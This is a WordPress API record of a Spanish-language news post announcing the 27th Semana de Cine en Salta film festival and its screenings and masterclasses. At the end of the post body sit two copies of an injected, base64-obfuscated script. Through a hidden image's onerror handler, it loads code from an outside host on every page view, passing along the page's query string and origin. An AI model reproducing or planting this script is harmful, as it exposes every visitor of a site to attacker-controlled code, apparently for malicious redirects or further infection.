{"id":3064,"date":"2023-09-05T15:51:52","date_gmt":"2023-09-05T18:51:52","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=3064"},"modified":"2025-08-14T00:09:02","modified_gmt":"2025-08-14T03:09:02","slug":"se-aproxima-la-27%cb%9a-semana-de-cine-en-salta","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=3064","title":{"rendered":"Se aproxima la 27\u02da Semana de Cine en Salta"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background\" style=\"background-color:#a31a52\"><em>Desde el 21 al 29 de septiembre en diferentes espacios se proyectar\u00e1n funciones de cine nacional e internacional de diferentes g\u00e9neros.<\/em><\/h4>\n\n\n\n<p>En 2023, la Semana de Cine en Salta cumple 27 a\u00f1os y se llevar\u00e1 a cabo del 21 al 29 de septiembre en diferentes espacios culturales. La secretar\u00eda de Cultura, junto a la Direcci\u00f3n de Audiovisuales de la Provincia, impulsa la 27\u02da Semana de Cine en Salta como un espacio de encuentro, exhibici\u00f3n y formaci\u00f3n audiovisual que se propone con el objetivo de promover e impulsar la reflexi\u00f3n y creaci\u00f3n de narrativas &nbsp;audiovisuales como as\u00ed tambi\u00e9n el disfrute de las obras cinematogr\u00e1ficas en nuestra ciudad.<\/p>\n\n\n\n<p>Durante esta edici\u00f3n, se realizar\u00e1n proyecciones de pel\u00edculas documentales y ficciones del pa\u00eds, la secci\u00f3n \u00abLa mirada salte\u00f1a\u00bb con contenido audiovisual local y un panorama internacional. El espacio de formaci\u00f3n profesional y capacitaciones estar\u00e1 dado por cuatro clases magistrales con reconocidos realizadores y productores audiovisuales. Las mismas ser\u00e1n moderadas por Juan Manuel Dominguez, programador de Buenos Aires Festival Internacional de Cine Independiente: BAFICI.<\/p>\n\n\n\n<p>En simult\u00e1neo, la propuesta contar\u00e1 con mesas y paneles integrados por realizadores y representantes de organismos e instituciones vinculados al quehacer acad\u00e9mico, cultural y art\u00edstico. Asimismo, la programaci\u00f3n comprender\u00e1 actividades propuestas por Abrir Archivo con una Mesa Panel: Memorias Audiovisuales del NOA presentada por la realizadora salte\u00f1a Daniela Seggiaro y Coordinada por la directora del Archivo y Biblioteca Hist\u00f3ricos de Salta ABHS.<br><br>En la misma participar\u00e1n: Ana Laura Soler de la Mediateca de Salta (ABHS); el investigador Radek S\u00e1nchez (Jujuy); y el realizador audiovisual Hern\u00e1n Ocampo (La Rioja) presentando una selecci\u00f3n de la obra audiovisual del cineasta pionero Hermes Quintana, films de enorme valor hist\u00f3rico, antropol\u00f3gico y art\u00edstico. El material, tanto en 8mm como en cinta abierta, fue digitalizado, actualizado y terminado de producir en 2022 se compone de ficciones, documentales, registros tur\u00edsticos y pel\u00edculas informativas filmadas entre 1960 y 1970.<\/p>\n\n\n\n<p>Finalmente, este a\u00f1o se pondr\u00e1 \u00e9nfasis en el cine comunitario a trav\u00e9s del programa Fernando Birri y &nbsp;en el cine inclusi\u00f3n con un conversatorio dado por el creador y director general del Festival Internacional de Cine Sordo, FiCSor. Como en a\u00f1os anteriores, tambi\u00e9n contaremos con proyecciones al aire libre en parques de la ciudad de Salta.<br><br>Se proyectar\u00e1 en paralelo en Parque Sur, Parque de Bicentenario y Parque de la Familia. La pantalla inflable del INCAA viajar\u00e1 al interior de la provincia y habr\u00e1 funciones gratuitas y aptas para todo p\u00fablico en La Merced, Chicoana, El Carril y Rosario del Lerma.<\/p>\n\n\n\n<p><strong>Inauguraci\u00f3n<\/strong><\/p>\n\n\n\n<p>La inauguraci\u00f3n se llevar\u00e1 a cabo el d\u00eda jueves 21 de septiembre a las 18 &nbsp;en el teatro de la Usina Cultural con una Masterclass en Crowdfunding como M\u00e9todo de Producci\u00f3n Cinematogr\u00e1fica. Contaremos con la presencia de Ana Garc\u00eda Blaya y Joaqu\u00edn Marqu\u00e9s Borchex, director y productor de la pel\u00edcula La Uruguaya, quienes compartir\u00e1n sus experiencias con este m\u00e9todo de producci\u00f3n.<br><br>En aquel momento a Garc\u00eda Blaya le pareci\u00f3 un desaf\u00edo poder realizarlo, ahora es una realidad y otra manera de producci\u00f3n que puede considerarse paralela al Instituto Nacional de Cine y Artes Audiovisuales, INCAA. Ese mismo d\u00eda jueves a las 21 en el Cine Hoyts se podr\u00e1 disfrutar de La Uruguaya con presencia de la directora y el productor.&nbsp;<br><br>Toda la programaci\u00f3n estar\u00e1 disponible a partir de su lanzamiento en las p\u00e1ginas y redes sociales oficiales de la Secretar\u00eda de Cultura.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:&nbsp;<strong><em><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/se-aproxima-la-27-semana-de-cine-en-salta-91680\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/em><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Desde el 21 al 29 de septiembre en diferentes espacios se proyectar\u00e1n funciones de cine nacional e internacional de diferentes g\u00e9neros. En 2023, la Semana de Cine en Salta cumple 27 a\u00f1os y se llevar\u00e1 a cabo del 21 al 29 de septiembre en diferentes espacios culturales. La secretar\u00eda de Cultura, junto a la Direcci\u00f3n [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":3065,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[15,17],"tags":[],"class_list":{"0":"post-3064","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-provincial","8":"category-sociales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3064"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3064"}],"version-history":[{"count":4,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3064\/revisions"}],"predecessor-version":[{"id":6972,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3064\/revisions\/6972"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/3065"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3064"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3064"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3064"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}